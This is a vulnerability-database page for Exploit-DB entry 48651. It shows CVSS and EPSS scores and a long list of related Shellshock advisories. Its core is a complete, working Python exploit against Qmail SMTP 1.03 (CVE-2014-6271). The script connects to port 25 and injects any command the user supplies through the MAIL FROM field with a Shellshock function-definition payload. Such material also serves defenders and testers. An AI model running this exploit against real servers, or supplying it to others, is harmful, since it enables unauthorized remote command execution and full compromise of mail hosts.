Lucene search
1F98DEDB-ID:48651HistoryJul 08, 2020 - 12:00 a.m.
Qmail SMTP 1.03 - Bash Environment Variable Injection
2020-07-0800:00:00
1F98D
www.exploit-db.com
134
10 High
CVSS2
Attack Vector
NETWORK
Attack Complexity
LOW
Authentication
NONE
Confidentiality Impact
COMPLETE
Integrity Impact
COMPLETE
Availability Impact
COMPLETE
AV:N/AC:L/Au:N/C:C/I:C/A:C
9.8 High
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
NONE
User Interaction
NONE
Scope
UNCHANGED
Confidentiality Impact
HIGH
Integrity Impact
HIGH
Availability Impact
HIGH
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
10 High
AI Score
Confidence
High
0.976 High
EPSS
Percentile
100.0%
# Exploit Title: Qmail SMTP 1.03 - Bash Environment Variable Injection
# Date: 2020-07-03
# Exploit Author: 1F98D
# Original Authors: Mario Ledo, Mario Ledo, Gabriel Follon
# Version: Qmail 1.03
# Tested on: Debian 9.11 (x64)
# CVE: CVE-2014-6271
# References:
# http://seclists.org/oss-sec/2014/q3/649
# https://lists.gt.net/qmail/users/138578
#
# Qmail is vulnerable to a Shellshock vulnerability due to lack of validation
# in the MAIL FROM field.
#
#!/usr/local/bin/python3
from socket import *
import sys
if len(sys.argv) != 4:
print('Usage {} <target ip> <email adress> <command>'.format(sys.argv[0]))
print("E.g. {} 127.0.0.1 'root@debian' 'touch /tmp/x'".format(sys.argv[0]))
sys.exit(1)
TARGET = sys.argv[1]
MAILTO = sys.argv[2]
CMD = sys.argv[3]
s = socket(AF_INET, SOCK_STREAM)
s.connect((TARGET, 25))
res = s.recv(1024)
if 'ESMTP' not in str(res):
print('[!] No ESMTP detected')
print('[!] Received {}'.format(str(res)))
print('[!] Exiting...')
sys.exit(1)
print('[*] ESMTP detected')
s.send(b'HELO x\r\n')
res = s.recv(1024)
if '250' not in str(res):
print('[!] Error connecting, expected 250')
print('[!] Received: {}'.format(str(res)))
print('[!] Exiting...')
sys.exit(1)
print('[*] Connected, sending payload')
s.send(bytes("MAIL FROM:<() {{ :; }}; {}>\r\n".format(CMD), 'utf-8'))
res = s.recv(1024)
if '250' not in str(res):
print('[!] Error sending payload, expected 250')
print('[!] Received: {}'.format(str(res)))
print('[!] Exiting...')
sys.exit(1)
print('[*] Payload sent')
s.send(bytes('RCPT TO:<{}>\r\n'.format(MAILTO), 'utf-8'))
s.recv(1024)
s.send(b'DATA\r\n')
s.recv(1024)
s.send(b'\r\nxxx\r\n.\r\n')
s.recv(1024)
s.send(b'QUIT\r\n')
s.recv(1024)
print('[*] Done')Related
nessus
nessus
Ubuntu 14.04 LTS : Bash vulnerability (USN-2362-1)
2014-09-25 00:00:00
Fedora 19 : bash-4.2.47-2.fc19 (2014-11503)
2014-09-26 00:00:00
SuSE 11.3 Security Update : bash (SAT Patch Number 9740)
2014-09-25 00:00:00
hackerone
hackerone
gentoo
gentoo
Bash: Code Injection
2014-09-24 00:00:00
saint
saint
Bash Environment Variable Handling Shell Command Injection Via CUPS
2014-11-05 00:00:00
ShellShock DHCP Server
2014-11-20 00:00:00
ShellShock DHCP Server
2014-11-20 00:00:00
packetstorm
packetstorm
TrendMicro InterScan Web Security Virtual Appliance Shellshock
2016-10-22 00:00:00
Shellshock Bashed CGI RCE
2014-10-03 00:00:00
Advantech Switch Bash Environment Variable Code Injection
2015-12-02 00:00:00
myhack58
myhack58
openvas
openvas
CentOS Update for bash CESA-2014:1293 centos5
2014-09-25 00:00:00
GNU Bash Environment Variable Handling RCE Vulnerability (Shellshock, Linux/Unix SSH Login, CVE-2014-6271) - Active Check
2014-09-26 00:00:00
SUSE: Security Advisory for bash (SUSE-SU-2014:1260-1)
2015-10-16 00:00:00
amazon
amazon
Critical: bash
2014-09-24 07:48:00
zdt
zdt
FutureNet NXR-G240 Series ShellShock Command Injection Exploit
2018-12-08 00:00:00
DHCP Client Bash Environment Variable Code Injection Exploit
2014-09-26 00:00:00
Dhclient Bash Environment Variable Injection Exploit
2014-09-28 00:00:00
exploitpack
exploitpack
IPFire - CGI Web Interface (Authenticated) Bash Environment Variable Code Injection
2014-10-01 00:00:00
PHP 5.6.2 - Shellshock Safe Mode Disable Functions Bypass Command Injection
2014-11-03 00:00:00
Cisco Unified Communications Manager - Multiple Vulnerabilities
2015-08-18 00:00:00
centos
centos
bash security update
2014-09-24 15:07:20
seebug
seebug
IPFire Cgi Web Interface Authenticated Bash Environment Variable Code Injection exploit
2014-10-10 00:00:00
GNU bash Environment Variable Command Injection (MSF)
2014-09-29 00:00:00
OpenVPN 2.2.29 - ShellShock Exploit
2014-10-10 00:00:00
slackware
slackware
[slackware-security] bash
2014-09-29 19:33:36
[slackware-security] bash
2014-09-24 23:37:00
ubuntu
ubuntu
Bash vulnerability
2014-09-24 00:00:00
fedora
fedora
[SECURITY] Fedora 21 Update: bash-4.3.22-3.fc21
2014-09-27 10:03:24
[SECURITY] Fedora 20 Update: bash-4.2.48-2.fc20
2014-09-26 09:03:00
[SECURITY] Fedora 21 Update: bash-4.3.25-2.fc21
2014-09-27 10:08:26
metasploit
metasploit
IPFire Bash Environment Variable Injection (Shellshock)
2016-05-30 00:40:12
Advantech Switch Bash Environment Variable Code Injection (Shellshock)
2015-12-01 17:33:45
cisa_kev
cisa_kev
GNU Bourne-Again Shell (Bash) Arbitrary Code Execution Vulnerability
2022-01-28 00:00:00
GNU Bourne-Again Shell (Bash) Arbitrary Code Execution Vulnerability
2022-01-28 00:00:00
securityvulns
securityvulns
[USN-2362-1] Bash vulnerability
2014-09-25 00:00:00
Cisco Unified Communications Manager Multiple Vulnerabilities (VP2015-001)
2015-08-17 00:00:00
Re: [oss-security] CVE-2014-6271: remote code execution through bash
2014-09-25 00:00:00
osv
osv
bash - security update
2014-09-24 00:00:00
debian
debian
[SECURITY] [email protected]
2014-09-24 15:22:27
[SECURITY] [DSA 3032-1] bash security update
2014-09-24 14:06:06
[SECURITY] [email protected]
2014-09-24 15:22:47
redhat
redhat
(RHSA-2014:1295) Critical: bash Shift_JIS security update
2014-09-24 00:00:00
(RHSA-2014:1293) Critical: bash security update
2014-09-24 00:00:00
(RHSA-2014:1294) Critical: bash security update
2014-09-24 00:00:00
thn
thn
suse
suse
Security update for bash (critical)
2014-09-27 01:04:16
Important security fix for bash that allows the injection of commands. (important)
2014-09-28 12:09:20
bash (critical)
2014-09-30 17:06:26
kitploit
kitploit
xShock - Shellshock Exploit
2020-03-19 11:30:00
mageia
mageia
Updated bash packages fix CVE-2014-6271
2014-09-24 22:42:05
oraclelinux
oraclelinux
bash security update
2014-09-24 00:00:00
bash security update
2014-09-24 00:00:00
threatpost
threatpost
Patching Bash Vulnerability a Challenge for ICS, SCADA
2014-09-25 14:34:38
Bash Botnet Exploit Found, Bash Patches Incomplete
2014-09-25 11:41:51
exploitdb
exploitdb
freebsd
freebsd
bash -- remote code execution vulnerability
2014-09-24 00:00:00
debiancve
debiancve
CVE-2014-7169
2014-09-25 01:55:04
CVE-2014-6271
2014-09-24 18:48:04
attackerkb
attackerkb
CVE-2014-7169
2014-09-25 00:00:00
prion
prion
Design/Logic Flaw
2015-01-13 11:59:00
Design/Logic Flaw
2014-09-24 18:48:00
Design/Logic Flaw
2014-09-25 01:55:00
cvelist
cvelist
CVE-2014-7169
2014-09-25 01:00:00
cve
cve
CVE-2014-62771
2022-10-03 16:20:32
ubuntucve
ubuntucve
CVE-2014-7169
2014-09-25 00:00:00
CVE-2014-6271
2014-09-24 00:00:00
hp
hp
impervablog
impervablog
Log4j: One Year Later
2022-12-09 12:38:39
paloalto
paloalto
Bash Shell remote code execution (CVE-2014-6271, CVE-2014-7169)
2014-09-24 00:00:00
checkpoint_security
checkpoint_security
cloudfoundry
cloudfoundry
CVE-2014-6271 and CVE-2014-7169 - ShellShock | Cloud Foundry
2014-09-25 00:00:00
lenovo
lenovo
GNU Bourne-Again Shell (Bash) 'Shellshock' - Lenovo Support US
2016-11-16 00:00:00
ibm
ibm
10 High
CVSS2
Attack Vector
NETWORK
Attack Complexity
LOW
Authentication
NONE
Confidentiality Impact
COMPLETE
Integrity Impact
COMPLETE
Availability Impact
COMPLETE
AV:N/AC:L/Au:N/C:C/I:C/A:C
9.8 High
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
NONE
User Interaction
NONE
Scope
UNCHANGED
Confidentiality Impact
HIGH
Integrity Impact
HIGH
Availability Impact
HIGH
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
10 High
AI Score
Confidence
High
0.976 High
EPSS
Percentile
100.0%
Related for EDB-ID:48651